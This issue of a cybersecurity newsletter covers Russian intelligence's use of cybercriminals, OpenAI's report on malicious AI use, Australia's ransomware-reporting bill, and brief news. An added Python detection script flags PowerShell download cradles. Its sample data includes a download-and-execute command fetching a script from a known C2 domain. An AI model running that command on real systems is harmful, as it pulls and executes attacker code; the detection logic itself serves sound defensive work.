Russia's GRU Thugs Double Down on Recruiting Cybercrooks

Your weekly dose of Seriously Risky Business news is written by Tom Uren and edited by Patrick Gray. It's supported by Lawfare with help from the William and Flora Hewlett Foundation. This week's edition is sponsored by Trail of Bits.

You can hear a podcast discussion of this newsletter by searching for "Risky Business News" in your podcatcher or subscribing via this RSS feed.

Bear says hack, Stable Diffusion

Several strands of evidence suggest Russia's use of cybercriminals to support its war effort in Ukraine is now planned and deliberate rather than ad hoc and opportunistic. 

Russia's strategy to harness cybercriminal resources has evolved over the duration of the war. Prior to the conflict, connections between the Russian state and cybercriminals appeared to be opportunistic and based on relationships and connections between individuals.

However, a Mandiant report from April this year suggested that Sandworm (aka GRU Unit 74455) was acquiring tools and bulletproof hosting services from criminal marketplaces. Now Russian intelligence services are taking the next logical step and are directly acquiring people from the criminal talent pool.

In its 2024 Digital Defense Report, released this week, Microsoft writes:

…Russian threat actors have integrated ever more commodity malware in their operations and appear to have outsourced some cyberespionage operations to criminal groups.
In June 2024, Storm-2049 (UAC-0184) used Xworm and Remcos RAT — commodity malware associated with criminal activity — to compromise at least 50 Ukrainian military devices. There was no obvious cybercriminal use for this compromise, suggesting the group was operating in support of Russian government objectives.
Between June-July 2023, Microsoft observed Federal Security Service (FSB)-attributed Aqua Blizzard appear to "hand-off" access to 34 compromised Ukrainian devices to the cybercriminal group Storm-0593 (also known as Invisimole). The hand-off occurred when Aqua Blizzard invoked a PowerShell script that downloaded software from a Storm-0593-controlled server. Storm-0593 then established command and control infrastructure and deployed Cobalt Strike beacons on most of the devices for follow-on activity. This beacon was configured with the domain dashcloudew.uk, which Microsoft assesses Storm-0593 registered and used in a previous spear-phishing campaign against Ukrainian military machines last year, suggesting a pattern by Storm-0593 of supporting state intelligence collection objectives.
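The hand-off Microsoft describes above leaves two artefacts a defender can actually look for: a PowerShell script that fetches a payload from a server the attacker controls, and a beacon configured with a known domain. As an added example (not from the newsletter or from Microsoft's report), the Python below scores PowerShell script-block log entries for "download cradle" patterns and checks any URL in them against a known-C2 list. The only real indicator in it is dashcloudew.uk, taken from the report quoted above; the hostnames, script text and scoring weights are constructed for illustration.

```python
"""Score PowerShell script-block log entries for download cradles and known C2.

Added example, not code from the newsletter or Microsoft. The sample events
below are constructed; in practice they would come from the text of
Microsoft-Windows-PowerShell/Operational Event ID 4104 (script block logging).
"""
import re
from dataclasses import dataclass, field

# Cmdlets/methods that fetch remote content or execute a string: the
# building blocks of a PowerShell download cradle.
CRADLE_PATTERNS = [
    re.compile(r"Net\.WebClient", re.I),
    re.compile(r"\bDownloadString\b|\bDownloadFile\b", re.I),
    re.compile(r"\bInvoke-WebRequest\b|\biwr\b|\bcurl\b|\bwget\b", re.I),
    re.compile(r"\bInvoke-Expression\b|\biex\b", re.I),
    re.compile(r"\bStart-BitsTransfer\b", re.I),
]
URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)", re.I)

# dashcloudew.uk is the Cobalt Strike C2 domain named in Microsoft's report;
# a real deployment would load this set from a threat-intel feed.
KNOWN_C2 = {"dashcloudew.uk"}


@dataclass
class Finding:
    host: str
    score: int
    reasons: list = field(default_factory=list)
    domains: list = field(default_factory=list)


def analyse_script_block(host: str, script: str) -> Finding:
    """One point per cradle pattern, ten points per URL on a known-C2 domain."""
    f = Finding(host=host, score=0)
    for pat in CRADLE_PATTERNS:
        if pat.search(script):
            f.score += 1
            f.reasons.append(pat.pattern)
    for m in URL_RE.finditer(script):
        dom = m.group(1).lower()
        f.domains.append(dom)
        if dom in KNOWN_C2 or any(dom.endswith("." + c) for c in KNOWN_C2):
            f.score += 10
            f.reasons.append(f"known C2 domain {dom}")
    return f


# Constructed sample script blocks (hostname, script text). ws-03 is a
# legitimate-looking download and shows why a threshold is needed.
SAMPLE_EVENTS = [
    ("ws-01", "Get-ChildItem C:\\Users | Select-Object Name"),
    ("ws-02", "IEX (New-Object Net.WebClient).DownloadString('http://dashcloudew.uk/update.ps1')"),
    ("ws-03", "Invoke-WebRequest -Uri https://updates.example.com/agent.msi -OutFile C:\\Temp\\agent.msi"),
]


def triage(events, threshold: int = 2):
    """Return findings at or above threshold, highest score first."""
    findings = [analyse_script_block(h, s) for h, s in events]
    return sorted((f for f in findings if f.score >= threshold), key=lambda f: -f.score)


if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"{f.host}: score={f.score} domains={f.domains} reasons={f.reasons}")
```

With the default threshold only ws-02 is reported: three cradle patterns plus the known domain. ws-03 uses Invoke-WebRequest alone, which is common in legitimate administration, so it falls below the bar; lowering the threshold to 1 surfaces it for a hunt over hosts that have no business fetching installers.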

In early September, the US government issued an advisory warning that, since 2020, Unit 29155, a Russian military intelligence (GRU) sabotage and assassination unit, had "expanded their tradecraft to include offensive cyber operations".

This appears to be partly on-the-job training and partly the recruitment of cybercriminals. Per the advisory:

FBI assesses the Unit 29155 cyber actors to be junior active-duty GRU officers under the direction of experienced Unit 29155 leadership. These individuals appear to be gaining cyber experience and enhancing their technical skills through conducting cyber operations and intrusions. Additionally, FBI assesses Unit 29155 cyber actors rely on non-GRU actors, including known cyber-criminals and enablers to conduct their operations.

GRU thugs do not strike us as natural keyboard maestros, but they are probably well suited to coercing weedy cybercrooks into hacking for the state.

Ukraine's cyber security organisation, the SSSCIP, has also reported on a group directed by personnel from law enforcement agencies in occupied Luhansk. There is no firm evidence here, but again we wonder whether law enforcement officers from regional Ukraine have hands-on-keyboard skills, or simply leverage over local cybercriminals.

Taken together, all these strands of evidence suggest a much more deliberate and structured recruitment of criminals into Russia's war effort. Recruiting or training skilled cyber security talent into intelligence agencies takes time, whereas telling crims to do some patriotic hacking or else… is quick. 

AI Is No Gift to Malicious Actors 

Malicious cyber actors are experimenting with AI, but have not found a way to use the technology to scale and accelerate their activities, according to prominent AI organisation OpenAI. 

Last week OpenAI released an Influence and Cyber Operations update report that analysed the activities of malicious actors using its tools, and included a range of case studies. The report provides insights into how some actors are experimenting with AI.

The case studies describe how actors try to use ChatGPT to assist with reconnaissance, vulnerability research, scripting or software development, or social engineering. 

In all these case studies OpenAI's conclusion is that "use of our models did not appear to provide them with novel capabilities or directions that they could not otherwise have obtained from multiple publicly available resources". 

Happily, OpenAI found that ChatGPT was very useful for its security work:

Throughout this investigation, our security teams leveraged ChatGPT to analyse, categorise, translate, and summarise interactions from adversary accounts. This enabled us to rapidly derive insights from large datasets while minimising the resources required for this work. As our models become more advanced, we expect we will also be able to use ChatGPT to reverse engineer and analyse the malicious attachments sent to employees.

OpenAI describes half a dozen covert influence operations targeting elections around the world. These operations used AI for content creation and the management of fake personas on social media sites. 

OpenAI found that these operations all had limited impact with "the majority of social media posts that we identified as being generated from our models received few or no likes, shares, or comments". 

Ironically, the ChatGPT-related operation that did go viral was a hoax on X that purported to be the output of a Russian troll account whose credits for using OpenAI's GPT-4o model had expired.  

Image from X, source

OpenAI said that this response appeared to be manually generated as it was not valid JSON and incorrectly referenced the model's name. Even though this post was a hoax, the same X account had been using OpenAI models to be argumentative "apparently in an attempt to bait controversy". 

So far at least, the apparent malicious use of AI is more interesting than the actual malicious use of AI.

Despite the absence of significant impact so far, we think these kinds of reports into the adversarial or malicious use of AI technologies should be applauded and encouraged in other companies. 

Australia's Actually Quite Sensible Cybersecurity Bill

New Australian cyber security legislation will introduce world-first reporting obligations for companies regarding ransomware incidents and payments. 

Beyond mandatory ransomware reporting, the Cyber Security Bill 2024 imposes security standards on smart devices and establishes an Australian Cyber Incident Review Board. These initiatives all make sense. What is surprising is that it has taken until 2024 to reach this stage. 

Cyber security authorities regularly bemoan the absence of authoritative data on incidents. Ransomware, and payments in particular, are notoriously underreported, and it is difficult to know if anti-ransomware initiatives are working when it is not possible to assess the state of play.

The reporting obligation applies to companies that meet a minimum revenue threshold and the information in these reports can only be used for cyber security purposes. It can't be forwarded to government regulators and used to fine companies, for example. 

At the same time, reporting incidents to cyber security authorities isn't a 'get out of jail free' card. If companies have been behaving improperly they can still be subject to regulatory action (although regulators need to build a case using information derived from other sources). 

The bill also establishes the Cyber Incident Review Board (CIRB), Australia's version of the US Cyber Safety Review Board. We are big fans of the US' CSRB, which has produced a number of impactful reports. These can sting companies into taking action, the most notable case being the report that lashed Microsoft for its 'cascade of security failures'.

However, the US is home to several of the world's most influential technology companies and is central to the internet, whereas Australia… is not. The CIRB aims to learn from the circumstances that led up to incidents through to industry and government responses. There have been several high-impact breaches in recent years where this kind of comprehensive review would have been tremendously valuable.

The Australian review board goes a step further than the US' CSRB with the ability to compel information from entities involved in an incident under review. To balance that power, the board is not to apportion blame and the legislation says that its final report cannot "provide the means to determine the liability of any entity in relation to a cyber security incident". 

Finally, the Cyber Security Bill will strengthen security standards for smart internet-connected devices. Rather than defining standards in legislation, the minister sets standards by issuing rules, which can be changed over time. This is not uncommon in Australian legislation, and social media safety standards are set by ministerial decree in the Basic Online Safety Expectations. The intent here is to adjust standards upward over time to the extent that the market will bear.

These are all good moves, but it is amazing they took so long. 

Three Reasons to Be Cheerful This Week:

  1. UK doing more to protect schools from ransomware: The UK's NCSC has announced that it is rolling out its Protective Domain Name System (PDNS) to schools nationally. The PDNS protects organisations by preventing them from connecting to known malicious domains and is already used across the UK Government including the Ministry of Defence. 
  2. Hardened hardware for the Trump campaign: Key members of the Trump campaign are reportedly using hardened devices including phones preinstalled with a stripped-down version of the Android operating system. It is good news that the campaign is investing in security, but we wonder how useful the devices will actually be — they are so locked down they only communicate within closed networks of like devices. 
  3. Smarter theft detection on Android: Google has published an interesting post on tightening Android to make it harder for thieves to get anything useful out of stolen phones. Some of these techniques are fairly simple, such as locking a phone if it is taken offline for a prolonged period (for data extraction or to avoid a remote wipe, for example) and making it easier to remotely lock or wipe a device from a trusted phone number. The interesting part of the post describes using machine learning to analyse multiple on-device signals to detect theft attempts and lock the device in response. You know if your phone is stolen, so given the array of sensors it has, why shouldn't your phone?

You might be hearing a lot about post-quantum (PQ) cryptography lately, and it's easy to wonder why it's such a big deal when nobody has actually seen a quantum computer. But even if a quantum computer is never built, new PQ standards are safer, more resilient, and more flexible than their classical counterparts. More from Trail of Bits in "Quantum is unimportant to post-quantum" by Opal Wright.

In this Risky Business News sponsored interview, Tom Uren talks to Dan Guido, CEO of Trail of Bits, about post-quantum cryptography. The pair dive into what it is, why it is needed now and how organisations are dealing with its adoption.

Shorts

Circling The Wagons Against Chinese Telco Hack

The Washington Post reports the Biden administration has formed a multi-agency 'unified coordination group' to manage the government's response to the hack of multiple US telecommunications companies.

The hack is now believed to affect 10 or 12 companies, up from three known victims last week. The report also states that responders are finding it difficult to evict the intruders because they don't know how they got in in the first place.

It sounds like this is going to take a long time to unwind.   

The FBI Gets Into Cryptocurrency

The Verge reports the FBI created an Ethereum-based cryptocurrency, NexFundAI, to investigate manipulation of cryptocurrency markets. Last week 18 individuals were charged with "widespread fraud and manipulation in the cryptocurrency markets" after they tried to manipulate the currency's price. 

Just like An0m, but for crypto! 

Risky Biz Talks

You can find the audio edition of this newsletter and other fine podcasts and interviews in the Risky Biz News feed (RSS, iTunes or Spotify).  

In our last "Between Two Nerds" discussion Tom Uren and The Grugq talk about how criminals are using deepfakes… but it is not the end of the world.

From Risky Biz News:

China says the US is framing other countries for espionage operations: The Chinese government has put out another report of questionable quality this week, claiming that the US is trying to smear poor lil' China as a bad cyber actor.

Beijing officials say that the US is actually the country behind most cyber espionage operations today, and they possess a "cyber weapon" that can mislead investigators and frame other states for its intrusions.

The report [English PDF] is the third in a series of reports that China's National Computer Virus Emergency Response Center (CVERC) has published on the topic this year, after previous reports in April and July.

The reports typically come out after the US government and US media expose new Chinese cyber-espionage operations in the US. This one came out days after US officials claimed that Chinese hackers breached sensitive systems at US telcos used for law enforcement wiretaps—basically, China wiretapped the US wiretapping system.

[more on Risky Business News including an examination of the differences between the US and Chinese approaches to outing operations]

Pro-Kremlin disinfo cluster disrupted ahead of Moldova's election: Meta has taken down a network of fake accounts engaged in a disinformation campaign targeting Moldova a week before the small Eastern European country is set to hold presidential elections and a referendum to join the EU.

The network used fake accounts to manage pages that posed as "independent" news entities.

They posted content primarily in Russian that criticised the country's current president Maia Sandu, Moldova's pro-EU politicians, and the country's ever-closer ties to neighbouring Romania.

[more on Risky Business News]

Dutch government to physically replace tens of thousands of hackable traffic lights: Dutch authorities will have to replace tens of thousands of insecure road traffic lights over the next six years, by 2030.

Officials are taking this extreme and very expensive step after a security researcher found a vulnerability that could allow threat actors to change traffic lights on demand.

The issue was discovered earlier this year by Alwin Peppels, a security engineer for Dutch security firm Cyber Seals.

Peppels says threat actors can use a software-defined radio to send commands to the control boxes that sit next to traffic lights.

[more on Risky Business News]